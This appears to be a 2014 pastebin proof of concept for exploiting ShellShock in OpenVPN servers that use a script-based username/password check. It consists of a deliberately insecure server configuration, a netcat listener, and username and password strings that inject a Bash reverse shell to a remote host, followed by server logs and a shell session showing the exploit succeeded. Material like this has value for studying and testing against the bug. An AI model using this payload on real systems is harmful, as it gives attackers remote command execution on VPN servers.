SHARE
TWEET

OpenVPN ShellShock PoC

a guest Sep 30th, 2014 15,318 Never
  1. # OpenVPN ShellShock PoC
  2. # Based on Fredrik Strömberg's HN post: https://news.ycombinator.com/item?id=8385332
  3. # Verified by @fj33r, posted at: http://sprunge.us/BGjP
  4.  
  5. ### server.conf
  6. port 1194
  7. proto udp
  8. dev tun
  9. client-cert-not-required
  10. auth-user-pass-verify /etc/openvpn/user.sh via-env
  11. tmp-dir "/etc/openvpn/tmp"
  12. ca ca.crt
  13. cert testing.crt
  14. key testing.key  # This file should be kept secret
  15. dh dh1024.pem
  16. server 10.8.0.0 255.255.255.0
  17. keepalive 10 120
  18. comp-lzo
  19. user nobody
  20. group nogroup
  21. persist-key
  22. persist-tun
  23. client-cert-not-required
  24. plugin /usr/lib/openvpn/openvpn-auth-pam.so login
  25. script-security 3
  26. status openvpn-status.log
  27. verb 3
  28.  
  29. ### user.sh
  30. #!/bin/bash
  31. echo "$username"
  32. echo "$password"
  33.  
  34. ### start server
  35. openvpn server.con
  36.  
  37. ### terminal 1
  38. nc -lp 4444
  39.  
  40. ### terminal 2
  41. sudo openvpn --client --remote 10.10.0.52 --auth-user-pass --dev tun --ca ca.cert --auth-nocache --comp-lzo
  42.  
  43. ### username && password were both shellshocked just incase
  44. user:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &
  45. pass:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &
  46.  
  47. ### log
  48. Mon Sep 29 20:56:56 2014 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts
  49. Mon Sep 29 20:56:56 2014 PLUGIN_INIT: POST /usr/lib/openvpn/openvpn-auth-pam.so '[/usr/lib/openvpn/openvpn-auth-pam.so] [login]' intercepted=PLUGIN_AUTH_USER_PASS_VERIFY
  50. Mon Sep 29 20:56:56 2014 Diffie-Hellman initialized with 1024 bit key
  51. Mon Sep 29 20:56:56 2014 WARNING: POTENTIALLY DANGEROUS OPTION --client-cert-not-required may accept clients which do not present a certificate
  52. Mon Sep 29 20:56:56 2014 TLS-Auth MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]
  53. Mon Sep 29 20:56:56 2014 Socket Buffers: R=[163840->131072] S=[163840->131072]
  54. Mon Sep 29 20:56:56 2014 ROUTE default_gateway=10.10.0.1
  55. Mon Sep 29 20:56:56 2014 TUN/TAP device tun0 opened
  56. Mon Sep 29 20:56:56 2014 TUN/TAP TX queue length set to 100
  57. Mon Sep 29 20:56:56 2014 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0
  58. Mon Sep 29 20:56:56 2014 /sbin/ifconfig tun0 10.8.0.1 pointopoint 10.8.0.2 mtu 1500
  59. Mon Sep 29 20:56:56 2014 /sbin/route add -net 10.8.0.0 netmask 255.255.255.0 gw 10.8.0.2
  60. Mon Sep 29 20:56:56 2014 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]
  61. Mon Sep 29 20:56:56 2014 GID set to nogroup
  62. Mon Sep 29 20:56:56 2014 UID set to nobody
  63. Mon Sep 29 20:56:56 2014 UDPv4 link local (bound): [undef]
  64. Mon Sep 29 20:56:56 2014 UDPv4 link remote: [undef]
  65. Mon Sep 29 20:56:56 2014 MULTI: multi_init called, r=256 v=256
  66. Mon Sep 29 20:56:56 2014 IFCONFIG POOL: base=10.8.0.4 size=62, ipv6=0
  67. Mon Sep 29 20:56:56 2014 Initialization Sequence Completed
  68. Mon Sep 29 20:57:54 2014 MULTI: multi_create_instance called
  69. Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Re-using SSL/TLS context
  70. Mon Sep 29 20:57:54 2014 10.10.0.56:1194 LZO compression initialized
  71. Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Control Channel MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]
  72. Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]
  73. Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Local Options hash (VER=V4): '530fdded'
  74. Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Expected Remote Options hash (VER=V4): '41690919'
  75. Mon Sep 29 20:57:54 2014 10.10.0.56:1194 TLS: Initial packet from [AF_INET]10.10.0.56:1194, sid=644ea55a 5f832b02
  76. AUTH-PAM: BACKGROUND: user '() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &' failed to authenticate: Error in service module
  77. Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: POST /usr/lib/openvpn/openvpn-auth-pam.so/PLUGIN_AUTH_USER_PASS_VERIFY status=1
  78. Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: plugin function PLUGIN_AUTH_USER_PASS_VERIFY failed with status 1: /usr/lib/openvpn/openvpn-auth-pam.so
  79. _________/bin/bash_-i____/dev/tcp/10.10.0.56/4444_0__1__
  80.  
  81. Mon Sep 29 20:57:57 2014 10.10.0.56:1194 TLS Auth Error: Auth Username/Password verification failed for peer
  82. Mon Sep 29 20:57:57 2014 10.10.0.56:1194 Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA
  83. Mon Sep 29 20:57:57 2014 10.10.0.56:1194 [] Peer Connection Initiated with [AF_INET]10.10.0.56:1194
  84. Mon Sep 29 20:57:59 2014 10.10.0.56:1194 PUSH: Received control message: 'PUSH_REQUEST'
  85. Mon Sep 29 20:57:59 2014 10.10.0.56:1194 Delayed exit in 5 seconds
  86. Mon Sep 29 20:57:59 2014 10.10.0.56:1194 SENT CONTROL [UNDEF]: 'AUTH_FAILED' (status=1)
  87. Mon Sep 29 20:58:01 2014 read UDPv4 [ECONNREFUSED]: Connection refused (code=111)
  88. Mon Sep 29 20:58:04 2014 10.10.0.56:1194 SIGTERM[soft,delayed-exit] received, client-instance exiting
  89.  
  90. ### nc listener
  91. nobody@debian:/etc/openvpn$ id
  92. id
  93. uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
RAW Paste Data
Top